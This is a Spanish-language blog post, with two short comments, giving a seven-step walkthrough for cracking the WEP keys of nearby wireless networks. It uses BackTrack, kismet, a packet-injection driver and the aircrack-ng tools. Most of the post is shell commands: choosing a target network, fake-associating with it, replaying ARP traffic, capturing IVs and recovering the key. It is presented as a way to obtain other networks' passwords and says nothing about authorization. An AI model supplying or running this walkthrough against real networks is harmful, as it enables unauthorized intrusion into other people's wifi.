Obtener clave wifi en 7 pasos

Rios de tinta se han escrito sobre este tema y, como yo también he hecho mis experimentos con las redes wifi, me gustaría plasmar aquí los pasos que he seguido para obtener alguna que otra clave de red.
Antes que nada, diré, que el proceso descrito a acontinuación solo sirve para las contraseñas WEP, las contraseñas WPA son un caso a parte.

Herramientas utilizadas:
BackTrack V3
Portátil Dell D510
El driver a emplear será el ipw2200 que ya ha sido parcheado por el equipo de Backtrack para permitir la inyección de paquetes.

Con estas herramientas a punto, podemos ponernos manos a la obra.

1. Apuntamos la dirección MAC de nuestra tarjeta wifi
# iwconfig --> obtenemos nuestra tarjeta wifi (eth0, eth1,...)
# ifconfig ethX

2. Editamos el archivo /usr/local/etc/kismet.conf y cambiamos el valor "source" de la siguiente forma:

 source=ipw2200,ethX,prueba

3. Guardamos y ejecutamos kismet
 # kismet

  3.1. Presionamos la "m" para quitar el ruido y a continuación pulsamos "s" y "S" para ordenar la lsita de redes por SSID.
  3.2. Esperamos unos minutos para obtener la mayor cantidad de información posible.
  3.3. Seleccionamos el objetivo y presionamos "Intro" par ver la información.
  3.4. Ahora apuntamos los datos necesarios ESSID, BSSID y CHANNEL.
  3.5. Si pulsamos "c" obtendremos la lista de clientes de la red.
  3.6. Presionamos "Shift q" para cerrar el programa.


4. Ahora tenemos que activar la interaz rtap:
 # rmmod ipw2200
# modprobe ipw2200 rtap_iface=1 channel=<CHANNEL>

5. Establecemos una conexión falsa con la red wifi utilizando una contraseña cualquiera:
 # iwconfig ethX ap <RedWifi>
 # iwconfig ethX key s:cualquiera
 # iwconfig ethX mode managed

6. Activamos las dos interfaces de red
 # ifconfig ethX up
 # ifconfig rtap0 up

7. Ahora que tenemos todo preparado, podemos comenzar a generar y capturar tráfico. A la vez que hacemos esto, podemos empezar a descifrar la contraseña. Para ello necesitamos abrir 3 terminales y poner en cada una uno de los siguientes comandos:

   7.1. capturamos trafico
   # airodump-ng --channel <channel> --bssid <redWifi> --ivs --write <nombrearchivo> rtap0

   7.2. generamos tráfico
   # aireplay-ng --arpreplay -b <redWifi> -h <nombrearchivo> -i rtap0 eth0

   7.3. Cuando hayamos capturado unos 200.000 IVs podemos comenzar con el proceso de descifrar la contraseña :
   # aircrack-ng -a 1 <nombrearchivo>.ivs

Ahora solo hay que sentarse y esperar resultados. El tiempo que se tarda en obtener la clave puede variar en función del tráfico de la red, de la intensidad de la señal, etc.

2 comentarios:

Anónimo dijo...

esta bueno tu blog

vayalinux dijo...

Gracias xD

Publicar un comentario